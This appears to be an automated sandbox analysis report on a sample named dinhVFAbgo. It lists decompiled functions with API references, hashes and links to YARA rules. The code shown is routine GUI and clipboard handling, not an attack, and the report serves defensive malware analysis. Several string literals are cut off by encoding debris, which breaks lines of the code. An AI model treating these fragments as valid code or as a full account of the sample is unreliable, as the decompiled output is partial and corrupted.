Instruction Fuzzy Hash: 45F01236000115BFCF122F96DC04A8A3F79FF457A0B118014FA58AA171C731C974DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CE86CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE86D6
IsRectEmpty.USER32 ref: 00CE886A

Part of subcall function 00CB9F54: MoveToEx.GDI32(00000000,?,?,?), ref: 00CB9F77
Part of subcall function 00CB9F54: MoveToEx.GDI32(?,?,?,?), ref: 00CB9F8C

Strings

\, xrefs: 00CE86E3

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Move$EmptyH_prolog3_Rect
String ID: \
API String ID: 2559423521-2545358515
Opcode ID: 0f1bd7e628c160748f6a7fe8aad696fe5a6eab73ab1c04e6070dc3f6eb116329
Instruction ID: 90218e0dbeecf041f57476b171b3181d5d3ead59e5f59c3f158cc7d59a854ae1
Opcode Fuzzy Hash: 0f1bd7e628c160748f6a7fe8aad696fe5a6eab73ab1c04e6070dc3f6eb116329
Instruction Fuzzy Hash: C2716C35A04625DFCF05AFA1C855BAD37B2AF05350F0400A9F91ABB2A2DF349E09DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D7B058 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00D7B058(intOrPtr* __ebx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				intOrPtr* _t47;
				void* _t56;
				intOrPtr* _t61;
				intOrPtr _t63;
				intOrPtr* _t71;
				intOrPtr* _t77;
				void* _t99;
				intOrPtr* _t103;
				intOrPtr* _t104;
				intOrPtr _t105;
				intOrPtr _t106;
				void* _t108;

				_t100 = __edi;
				_t99 = __edx;
				_t76 = __ebx;
				_push(0x5c);
				E00DDD595(0xe1162a, __ebx, __edi, __esi);
				_t103 =  *((intOrPtr*)(_t108 + 8));
				if(_t103 == 0) {
					L11:
					E00CAA4E7(_t76, _t77, _t100, _t103, __eflags);
					asm("int3");
					_push(8);
					E00DDD52C(0xe086da, _t76, _t100, _t103);
					_t104 = _t77;
					_t42 =  *((intOrPtr*)(_t104 + 0x2c));
					__eflags =  *((intOrPtr*)(_t42 - 0xc));
					if( *((intOrPtr*)(_t42 - 0xc)) == 0) {
						__eflags =  *((intOrPtr*)(_t104 + 0x20));
						if( *((intOrPtr*)(_t104 + 0x20)) != 0) {
							E00CA67E1(_t108 - 0x10);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							_t47 = E00CA2A90(_t108 - 0x10,  *((intOrPtr*)(_t104 + 0x20)));
							_t105 =  *((intOrPtr*)(_t108 - 0x10));
							__eflags = _t47;
							if(_t47 != 0) {
								_t47 = E00CA9329(_t108 - 0x10, 0xa, 0);
								__eflags = _t47 - 0xffffffff;
								if(_t47 != 0xffffffff) {
									_t26 = _t47 + 1; // 0x1
									__eflags =  *((intOrPtr*)(_t105 - 0xc)) - _t26;
									E00CA7B78(_t108 - 0x10, _t108 - 0x14, _t26,  *((intOrPtr*)(_t105 - 0xc)) - _t26);
									 *((char*)(_t108 - 4)) = 1;
									_t47 = E00CA2975(E00CA68A8( *((intOrPtr*)(_t108 + 8)) + 0x2c, _t108 - 0x14),  *((intOrPtr*)(_t108 - 0x14)) - 0x10);
								}
							}
							E00CA2975(_t47, _t105 - 0x10);
						}
					}
					__eflags = 1;
					return E00DDD4FA(1);
				} else {
					_t100 = 0;
					_t77 = _t103;
					_t56 = E00D861A6(_t77,  *0xe887d4 & 0x0000ffff, 0);
					_t111 = _t56;
					if(_t56 == 0) {
						goto L11;
					} else {
						 *((intOrPtr*)(_t108 - 0x14)) = 0;
						 *((intOrPtr*)(_t108 - 4)) = 0;
						_t76 = E00D85FA1(__ebx, _t103, 0, _t103, _t111, E00D7B2E9(__ebx, _t77, 0, _t103, _t111) & 0x0000ffff, 0);
						if(_t76 != 0) {
							_push(0);
							_push(0x1000);
							_push(1);
							_push(_t76);
							E00CAE222(_t76, _t108 - 0x68, 0, _t103, __eflags);
							_push(0);
							_t77 = _t108 - 0x68;
							 *((char*)(_t108 - 4)) = 1;
							_t61 = E00CBFF75(_t76, _t77, _t99, 0, 0);
							__eflags = _t61;
							if(__eflags == 0) {
								goto L11;
							} else {
								_t77 = _t61;
								_t100 = E00CACA8D(_t77, _t103, __eflags);
								 *((intOrPtr*)(_t108 - 0x14)) = _t100;
								__eflags = _t100;
								if(__eflags == 0) {
									goto L11;
								} else {
									_t63 = E00CACB0B(_t100, "\xef\xbf\xbd\									_t106 =  *_t100;
									__eflags = _t63;
									if(__eflags == 0) {
										 *0xe17a64(1);
										 *((intOrPtr*)(_t106 + 4))();
										_t100 = 0;
										__eflags = 0;
										 *((intOrPtr*)(_t108 - 0x14)) = 0;
									} else {
										 *0xe17a64(_t108 - 0x68);
										 *((intOrPtr*)(_t106 + 8))();
									}
									E00CAE7CB(_t108 - 0x68, __eflags);
									 *0xe17a64(1);
									 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4))))();
									E00CAE355(_t108 - 0x68, _t99);
									_t71 = _t100;
									goto L4;
								}
							}
						} else {
							_t71 = 0;
							L4:
							return E00DDD4FA(_t71);
						}
					}
				}
			}

0x00d7b058
0x00d7b058
0x00d7b058
0x00d7b058
0x00d7b05f
0x00d7b064
0x00d7b069
0x00d7b19e
0x00d7b19e
0x00d7b1a3
0x00d7b1a4
0x00d7b1ab
0x00d7b1b0
0x00d7b1b2
0x00d7b1b7
0x00d7b1ba
0x00d7b1bc
0x00d7b1bf
0x00d7b1c4
0x00d7b1cf
0x00d7b1d2
0x00d7b1d7
0x00d7b1da
0x00d7b1dc
0x00d7b1e4
0x00d7b1e9
0x00d7b1ec
0x00d7b1ee
0x00d7b1f4
0x00d7b1ff
0x00d7b20b
0x00d7b21d
0x00d7b21d
0x00d7b1ec
0x00d7b225
0x00d7b225
0x00d7b1bf
0x00d7b22c
0x00d7b232
0x00d7b06f
0x00d7b076
0x00d7b07a
0x00d7b07c
0x00d7b081
0x00d7b083
0x00000000
0x00d7b089
0x00d7b089
0x00d7b08c
0x00d7b0a0
0x00d7b0a4
0x00d7b0b0
0x00d7b0b1
0x00d7b0b6
0x00d7b0b8
0x00d7b0bc
0x00d7b0c1
0x00d7b0c4
0x00d7b0c7
0x00d7b0cb
0x00d7b0d0
0x00d7b0d2
0x00000000
0x00d7b0d8
0x00d7b0d8
0x00d7b0df
0x00d7b0e1
0x00d7b0e4
0x00d7b0e6
0x00000000
0x00d7b0ec
0x00d7b0f3
0x00d7b0f8
0x00d7b0fa
0x00d7b0fc
0x00d7b117
0x00d7b11f
0x00d7b122
0x00d7b122
0x00d7b124
0x00d7b0fe
0x00d7b105
0x00d7b10d
0x00d7b10d
0x00d7b12a
0x00d7b138
0x00d7b140
0x00d7b145
0x00d7b14a
0x00000000
0x00d7b14a
0x00d7b0e6
0x00d7b0a6
0x00d7b0a6
0x00d7b0a8
0x00d7b0ad
0x00d7b0ad
0x00d7b0a4
0x00d7b083

APIs

__EH_prolog3_catch.LIBCMT ref: 00D7B05F
__EH_prolog3.LIBCMT ref: 00D7B1AB

Part of subcall function 00D861A6: IsClipboardFormatAvailable.USER32(00000000), ref: 00D861BA

Part of subcall function 00D7B2E9: __EH_prolog3.LIBCMT ref: 00D7B2F0
Part of subcall function 00D7B2E9: RegisterWindowMessageA.USER32(00000010,00000004,00D7B094,00000000,00000000,0000005C,00CEFC5B,?,00000550), ref: 00D7B33A

Part of subcall function 00D85FA1: __EH_prolog3_catch.LIBCMT ref: 00D85FA8
Part of subcall function 00D85FA1: ReleaseStgMedium.OLE32(?), ref: 00D8602C
Part of subcall function 00D85FA1: ReleaseStgMedium.OLE32(?), ref: 00D86073

Strings

, xrefs: 00D7B0EC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3H_prolog3_catchMediumRelease$AvailableClipboardFormatMessageRegisterWindow
String ID:
API String ID: 3315753775-2740779761
Opcode ID: b7315aa30de95de1bc76a3b63358290878c3b2a19c9829cabe617f4222e5bfde
Instruction ID: 016b5aa7ca5a1ae3797847e9000b3f558688376b3643889c7e6e7fb15f7c33be
Opcode Fuzzy Hash: b7315aa30de95de1bc76a3b63358290878c3b2a19c9829cabe617f4222e5bfde
Instruction Fuzzy Hash: 5B41C231A002069BCB14EBA5CC55EBFB7B5EF85714F448419B41AAB291EF309E05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CD24BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CD24BE(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, signed int _a24) {
				signed char _v4;
				signed char _v16;
				char _v20;
				char _v24;
				void* _t44;
				signed int _t45;
				intOrPtr* _t47;
				signed int _t53;
				signed int _t54;
				signed char _t64;
				signed int* _t66;
				signed char _t67;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t88;
				signed int _t89;
				signed char _t92;

				_push(0xc);
				E00DDD52C(0xe09ecb, __ebx, __edi, __esi);
				_t88 = __ecx;
				_t66 = _a24;
				_t91 = 0;
				_v16 = 0;
				if(_t66 != 0) {
					_t44 = 3;
					__eflags = _a8 - _t44;
					if(_a8 != _t44) {
						L9:
						_t89 =  *(_t88 + 0x404);
						__eflags = _t89;
						if(_t89 == 0) {
							goto L20;
						} else {
							__eflags =  *((intOrPtr*)(_t89 + 0x58)) - _t91;
							if(__eflags == 0) {
								_push( *((intOrPtr*)(_t89 + 0x88)));
								_t47 = E00CA2ABC(_t66,  &_v20, _t89, _t91, __eflags);
								_t67 = 2;
							} else {
								_t91 =  *((intOrPtr*)( *_t89 + 0x24));
								 *0xe17a64( &_v24);
								_t47 =  *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0x24))))();
								_t67 = 1;
							}
							_v16 = _t67;
							_push( *_t47 - 0x10);
							_v4 = _t67;
							_t21 = E00CA68F8(_t67, _t89, _t91) + 0x10; // 0x10
							_t92 = _t21;
							_v16 = _t92;
							_v4 = 3;
							__eflags = _t67 & 0x00000002;
							if((_t67 & 0x00000002) != 0) {
								_t67 = _t67 & 0xfffffffd;
								__eflags = _t67;
								_t50 = E00CA2975(_t50, _v20 - 0x10);
							}
							_v4 = 5;
							__eflags = _t67 & 0x00000001;
							if((_t67 & 0x00000001) != 0) {
								E00CA2975(_t50, _v24 - 0x10);
							}
							_t74 = E00CAEEBF(_t92,  *((intOrPtr*)(_t92 - 0xc)));
							__eflags = _t74;
							if(_t74 == 0) {
								goto L22;
							} else {
								_t55 = _a24;
								 *_a24 = _t74;
								_t35 = _t92 - 0x10; // 0x0
								_t76 = _t35;
								goto L19;
							}
						}
					} else {
						__eflags = _a16;
						if(_a16 != 0) {
							goto L9;
						} else {
							E00CA67E1( &_v16);
							_v4 = 0;
							E00CB2D00(_t88,  &_v16);
							_t64 = _v16;
							__eflags =  *(_t64 - 0xc);
							if( *(_t64 - 0xc) != 0) {
								_t55 = E00CAEEBF(_t64,  *(_t64 - 0xc));
								_pop(_t74);
								__eflags = _t55;
								if(_t55 == 0) {
									L22:
									E00CA2DEB(_t74);
									asm("int3");
									_t53 = _a12;
									__eflags = _t53;
									if(_t53 == 0) {
										L29:
										_t54 = 0x80070057;
									} else {
										_t75 = 3;
										__eflags = _a4 - _t75;
										if(_a4 == _t75) {
											__eflags = _a12;
											if(_a12 != 0) {
												goto L25;
											} else {
												 *((intOrPtr*)(_t53 + 8)) = 0x21;
											}
											goto L28;
										} else {
											__eflags = _a12;
											if(_a12 != 0) {
												goto L29;
											} else {
												L25:
												 *((intOrPtr*)(_t53 + 8)) = 0x1c;
												L28:
												 *_t53 = _t75;
												_t54 = 0;
											}
										}
									}
									return _t54;
								} else {
									goto L6;
								}
							} else {
								__imp__#2(L"PropertyList");
								L6:
								 *_t66 = _t55;
								_t76 = _v16 - 0x10;
								L19:
								E00CA2975(_t55, _t76);
								L20:
								_t45 = 0;
								__eflags = 0;
								goto L21;
							}
						}
					}
				} else {
					_t45 = 0x80070057;
					L21:
					return E00DDD4FA(_t45);
				}
			}

0x00cd24be
0x00cd24c5
0x00cd24ca
0x00cd24cc
0x00cd24cf
0x00cd24d1
0x00cd24d6
0x00cd24e4
0x00cd24e5
0x00cd24e9
0x00cd253c
0x00cd253c
0x00cd2542
0x00cd2544
0x00000000
0x00cd254a
0x00cd254a
0x00cd254d
0x00cd2569
0x00cd2572
0x00cd2579
0x00cd254f
0x00cd2551
0x00cd255a
0x00cd2562
0x00cd2566
0x00cd2566
0x00cd257f
0x00cd2582
0x00cd2583
0x00cd258c
0x00cd258c
0x00cd258f
0x00cd2592
0x00cd2599
0x00cd259c
0x00cd25a1
0x00cd25a1
0x00cd25a7
0x00cd25a7
0x00cd25ac
0x00cd25b0
0x00cd25b3
0x00cd25bb
0x00cd25bb
0x00cd25cb
0x00cd25cd
0x00cd25cf
0x00000000
0x00cd25d1
0x00cd25d1
0x00cd25d4
0x00cd25d6
0x00cd25d6
0x00000000
0x00cd25d6
0x00cd25cf
0x00cd24eb
0x00cd24eb
0x00cd24ee
0x00000000
0x00cd24f0
0x00cd24f3
0x00cd24fb
0x00cd2501
0x00cd2506
0x00cd2509
0x00cd250d
0x00cd252b
0x00cd2531
0x00cd2532
0x00cd2534
0x00cd25e8
0x00cd25e8
0x00cd25ed
0x00cd25f1
0x00cd25f4
0x00cd25f6
0x00cd2624
0x00cd2624
0x00cd25f8
0x00cd25fa
0x00cd25fb
0x00cd25ff
0x00cd2610
0x00cd2614
0x00000000
0x00cd2616
0x00cd2616
0x00cd2616
0x00000000
0x00cd2601
0x00cd2601
0x00cd2605
0x00000000
0x00cd2607
0x00cd2607
0x00cd2607
0x00cd261d
0x00cd261d
0x00cd2620
0x00cd2620
0x00cd2605
0x00cd25ff
0x00cd262a
0x00cd253a
0x00000000
0x00cd253a
0x00cd250f
0x00cd2514
0x00cd251a
0x00cd251a
0x00cd251f
0x00cd25d9
0x00cd25d9
0x00cd25de
0x00cd25de
0x00cd25de
0x00000000
0x00cd25de
0x00cd250d
0x00cd24ee
0x00cd24d8
0x00cd24d8
0x00cd25e0
0x00cd25e5
0x00cd25e5

APIs

__EH_prolog3.LIBCMT ref: 00CD24C5
SysAllocString.OLEAUT32(PropertyList), ref: 00CD2514

Strings

PropertyList, xrefs: 00CD250F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocH_prolog3String
String ID: PropertyList
API String ID: 1826817320-1939653111
Opcode ID: 2ae0e781c400a27731c85fa29468d31f084956addc1e64bc03834733535aeb25
Instruction ID: c424cf3a5d35526d281c371a7651214f267f24fb07059114fc7ade8751c5ba43
Opcode Fuzzy Hash: 2ae0e781c400a27731c85fa29468d31f084956addc1e64bc03834733535aeb25
Instruction Fuzzy Hash: 7841AC70A0020ACFDB15DF68E855BAEB7B4BF25304F14441AE6219B391EB70DA44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CE20AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CE20AE(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, void* _a8, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				short _v0;
				signed int _v4;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t31;
				intOrPtr _t38;
				void* _t39;
				intOrPtr _t43;
				intOrPtr* _t49;
				intOrPtr* _t60;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t72;
				void* _t73;
				void* _t76;

				_t73 = __esi;
				_push(4);
				E00DDD52C(0xe08583, __ebx, __edi, __esi);
				_t70 = __ecx;
				if(_a8 != 3) {
					L8:
					_t26 = 1;
					__eflags = 1;
					goto L9;
				} else {
					_t67 = _a16;
					if(_t67 != 0) {
						if(__eflags <= 0) {
							goto L8;
						} else {
							_t74 =  *((intOrPtr*)( *__ecx + 0x254));
							 *0xe17a64(_t67);
							 *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x254))))();
							_t54 = __ecx + 0xd8;
							_t31 =  *((intOrPtr*)(__ecx + 0xd8));
							__eflags =  *((intOrPtr*)(_t31 - 0xc));
							if( *((intOrPtr*)(_t31 - 0xc)) == 0) {
								goto L8;
							} else {
								 *_a24 = E00CAEEA9(__ebx, _t54, __ecx, _t74);
								goto L4;
							}
						}
						goto L9;
					} else {
						E00CA67E1( &_v16);
						_v4 = _v4 & 0x00000000;
						E00CB2D00(_t70,  &_v16);
						_t60 = E00CAEEBF(_v16,  *((intOrPtr*)(_v16 - 0xc)));
						if(_t60 == 0) {
							_t38 = E00CA2DEB(_t60);
							asm("int3");
							__eflags = _v0 - 3;
							_t68 = _a8;
							_push(__ebx);
							_push(_t70);
							_t49 = _t60;
							if(_v0 != 3) {
								__eflags = _t68;
								if(_t68 != 0) {
									goto L19;
								} else {
									goto L15;
								}
							} else {
								__eflags = _t68;
								if(_t68 != 0) {
									L15:
									_t72 = _a20;
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t39 = 0x80070057;
									} else {
										 *0xe17a64(_t73);
										 *((intOrPtr*)( *((intOrPtr*)( *_t49 + 0x254))))();
										_t63 = _t49 + 0xe0;
										_t43 =  *((intOrPtr*)(_t49 + 0xe0));
										_t76 = _t68;
										__eflags =  *((intOrPtr*)(_t43 - 0xc));
										if( *((intOrPtr*)(_t43 - 0xc)) != 0) {
											 *_t72 = E00CAEEA9(_t49, _t63, _t72, _t76);
											goto L13;
										} else {
											_t39 = 1;
										}
									}
								} else {
									__imp__#2(L"ControlPane");
									 *_a20 = _t38;
									L13:
									_t39 = 0;
								}
							}
							return _t39;
						} else {
							 *_a24 = _t60;
							E00CA2975(_a24, _v16 - 0x10);
							L4:
							_t26 = 0;
							L9:
							return E00DDD4FA(_t26);
						}
					}
				}
			}

0x00ce20ae
0x00ce20ae
0x00ce20b5
0x00ce20ba
0x00ce20c1
0x00ce213a
0x00ce213c
0x00ce213c
0x00000000
0x00ce20c3
0x00ce20c3
0x00ce20c8
0x00ce2109
0x00000000
0x00ce210b
0x00ce210e
0x00ce2116
0x00ce211e
0x00ce2120
0x00ce2126
0x00ce2128
0x00ce212c
0x00000000
0x00ce212e
0x00ce2136
0x00000000
0x00ce2136
0x00ce212c
0x00000000
0x00ce20ca
0x00ce20cd
0x00ce20d2
0x00ce20dc
0x00ce20ef
0x00ce20f3
0x00ce2145
0x00ce214a
0x00ce214e
0x00ce2153
0x00ce2156
0x00ce2157
0x00ce2158
0x00ce215a
0x00ce2174
0x00ce2176
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce215c
0x00ce215c
0x00ce215e
0x00ce2178
0x00ce2178
0x00ce217b
0x00ce217d
0x00ce21b2
0x00ce21b2
0x00ce217f
0x00ce218b
0x00ce2193
0x00ce2195
0x00ce219b
0x00ce219d
0x00ce219e
0x00ce21a2
0x00ce21ae
0x00000000
0x00ce21a4
0x00ce21a6
0x00ce21a6
0x00ce21a2
0x00ce2160
0x00ce2165
0x00ce216e
0x00ce2170
0x00ce2170
0x00ce2170
0x00ce215e
0x00ce21ba
0x00ce20f5
0x00ce20f8
0x00ce2100
0x00ce2105
0x00ce2105
0x00ce213d
0x00ce2142
0x00ce2142
0x00ce20f3
0x00ce20c8

APIs

__EH_prolog3.LIBCMT ref: 00CE20B5
SysAllocString.OLEAUT32(ControlPane), ref: 00CE2165

Part of subcall function 00CB2D00: GetWindowTextLengthA.USER32(?), ref: 00CB2D12
Part of subcall function 00CB2D00: GetWindowTextA.USER32 ref: 00CB2D2B

Part of subcall function 00CAEEBF: MultiByteToWideChar.KERNEL32(00000003,00000000,?,?,00000000,00000000,?,?,?,?,00CAEEB4,?,?), ref: 00CAEED2
Part of subcall function 00CAEEBF: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00CAEEDC
Part of subcall function 00CAEEBF: MultiByteToWideChar.KERNEL32(00000003,00000000,?,?,00000000,00000000,?,?,?,?,00CAEEB4,?,?), ref: 00CAEEF3

Strings

ControlPane, xrefs: 00CE2160

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocByteCharMultiStringTextWideWindow$H_prolog3Length
String ID: ControlPane
API String ID: 427039684-575917865
Opcode ID: 0c76f2c3b47efa7f2ba2f77f5bbbab1f594e39ecac2e699858352cb47a93a772
Instruction ID: d141a8f847629460d4aad3ea766c4d8ce9e66f3272c63930e0c3e1b6c293e041
Opcode Fuzzy Hash: 0c76f2c3b47efa7f2ba2f77f5bbbab1f594e39ecac2e699858352cb47a93a772
Instruction Fuzzy Hash: 2031A035A00246DFCB04EF66D854BBE73BAFF95314F148429E916CB261EB309E45DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D071C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D071C4(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a20) {
				void* __esi;
				void* _t19;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;

				_t62 = _a20;
				_t42 = __ecx;
				_t60 =  *((intOrPtr*)(_t62 + 0xbc));
				if(_t60 != 0) {
					 *0xe17a64(_a4, _a8);
					 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 0x1ac))))();
					_t62 = _a20;
				}
				_t61 = E00CB2A08(_t42);
				_t19 = E00CACA6C("$?\xef\xbf\xbd"				_pop(_t47);
				_t69 = _t19;
				if(_t19 == 0) {
					_t61 = E00CAC659(_t47, _t62, _t69);
				}
				 *0xe17a64(0,  *((intOrPtr*)(_t62 + 0xd8)));
				 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 0x194))))();
				E00D1A258(_t61,  *((intOrPtr*)( *((intOrPtr*)(_a20 + 0xd8)) + 0xc)), 1);
				if(_t61 != E00CB2A08(_t42)) {
					 *0xe17a64(1, _t42, _t42);
					 *((intOrPtr*)( *((intOrPtr*)( *_t42 + 0x190))))();
				}
				 *0xe17a64();
				 *((intOrPtr*)( *((intOrPtr*)( *_a20 + 0x60))))();
				 *0xe17a64(1);
				 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 0x178))))();
				SendMessageA( *(_t61 + 0x20), 0x362, 0xe001, 0);
				return UpdateWindow( *(_t61 + 0x20));
			}

0x00d071c9
0x00d071cc
0x00d071cf
0x00d071d7
0x00d071e9
0x00d071f1
0x00d071f3
0x00d071f3
0x00d071fd
0x00d07205
0x00d0720b
0x00d0720c
0x00d0720e
0x00d07215
0x00d07215
0x00d07229
0x00d07231
0x00d07243
0x00d07251
0x00d07261
0x00d07269
0x00d07269
0x00d07275
0x00d0727d
0x00d0728b
0x00d07293
0x00d072a4
0x00d072b7

APIs

SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00D072A4
UpdateWindow.USER32(?), ref: 00D072AD

Strings

$?, xrefs: 00D07200

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSendUpdateWindow
String ID: $?
API String ID: 4144561194-773356789
Opcode ID: e5f5d6e8abb6600c19bf06d9158b777e56708415718fbf96a949ff604c76e770
Instruction ID: bf9562787f92d5ef76304536acc6a1eb510cc4874999c76d40246ccfd575cf0f
Opcode Fuzzy Hash: e5f5d6e8abb6600c19bf06d9158b777e56708415718fbf96a949ff604c76e770
Instruction Fuzzy Hash: 33219E357043149FDB049F64CC85AAD7BA6EF89B20F05406AF90AAB3A1CB71AD409B90

Uniqueness

Uniqueness Score: -1.00%

Function 00CD44F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CD44F9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __ebp;
				void* _t17;
				intOrPtr* _t29;
				intOrPtr _t38;
				void* _t56;

				_t56 = __fp0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t38 = _a12;
				_t43 = __ecx;
				if(_a4 != 0x4e ||  *((intOrPtr*)(__ecx + 0x84)) != 0) {
					L7:
					_push(_a16);
					_t17 = E00CB32C4(_t43, _t43, _t56, _a4, _a8, _t38);
				} else {
					if(_t38 == 0) {
						E00CAA4E7(__ebx, __ecx, _t38, __ecx, __eflags);
						asm("int3");
						__eflags =  *((intOrPtr*)(__ecx + 0x80));
						if(__eflags == 0) {
							return E00CB236A(__ebx, __ecx, __eflags);
						}
						return E00CD48F5(__ebx, __ecx, __edx, _t38, __ecx, __eflags, _a4, _a8);
					}
					if( *((intOrPtr*)(_t38 + 8)) != 0xfffffe6e) {
						goto L7;
					} else {
						_t29 = E00CD42E2(__ecx, _t38);
						if(_t29 == 0 || SendMessageA( *(__ecx + 0x20), 0x110a, 9, 0) == 0) {
							goto L7;
						} else {
							 *(_t29 + 0x16c) = 1;
							 *0xe17a64(E00CD75E3(_t43, _t43), SendMessageA( *(_t43 + 0x20), 0x110a, 9, 0));
							 *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x188))))();
							 *(_t29 + 0x16c) =  *(_t29 + 0x16c) & 0x00000000;
							_t17 = 1;
						}
					}
				}
				return _t17;
			}

0x00cd44f9
0x00cd4500
0x00cd4501
0x00cd4502
0x00cd4503
0x00cd4506
0x00cd4508
0x00cd4588
0x00cd4588
0x00cd4594
0x00cd4513
0x00cd4515
0x00cd45a0
0x00cd45a5
